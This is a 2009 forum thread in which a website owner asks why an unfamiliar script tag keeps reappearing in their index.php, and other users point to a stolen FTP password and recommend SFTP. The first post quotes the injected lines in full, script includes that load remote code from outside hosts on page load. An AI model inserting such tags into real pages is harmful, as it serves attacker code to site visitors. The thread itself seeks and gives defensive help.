Page 1 of 1

index.php getting hacked - adding code

Posted: Wed Oct 28, 2009 8:40 am
by oodya
Hi all,

I would really appreciate a bit of help with this. A few days ago, I started messing about with adding a shopping cart to my website. Since then I noticed that the following got added to my index.php file:

</head><script src=http://zegarki.ehost.pl/artdance/podklad.php ></script>

The above coding is not something that I have put in myself.

Since this coding has added itself to my site, I have decided to delete everything on my website and replace all the files with a backup that I had taken (which does not have the above coding in it).

I have then seen the code re-appear again in my index.php file. I can remove this section of the code manually, but I know it will keep on coming back.

Now the following code is appearing:

The following coding has been added to my site now:

</head><script src=http://christinateatern.se/images/karta ... -small.php ></script>

Can someone please help me with this. If any further info is needed from myself, please let me know.

Thanks.

Re: index.php getting hacked - adding code

Posted: Thu Oct 29, 2009 1:19 am
by flying_circus
I had a very similar problem. Something was appending a script to the end of any index.* file on my server, in root and sub-directories. I changed my FTP password and it has since sub-sided. I'm not sure how my password got compromised, but apparently it did. It was maddening trying to solve the issue, plus my web host began renaming my index files and changing permissions, so they could not be accessed. :banghead:

Re: index.php getting hacked - adding code

Posted: Thu Oct 29, 2009 4:18 am
by oodya
Hi,

Thanks for your reply. I have reset my password and will monitor this.

Thanks for your help.

Re: index.php getting hacked - adding code

Posted: Thu Oct 29, 2009 10:45 am
by AlexC
That's what you get for using such a crap protocol =) Use something other than FTP, for example SFTP (no not FTPS) and you'll be far better off.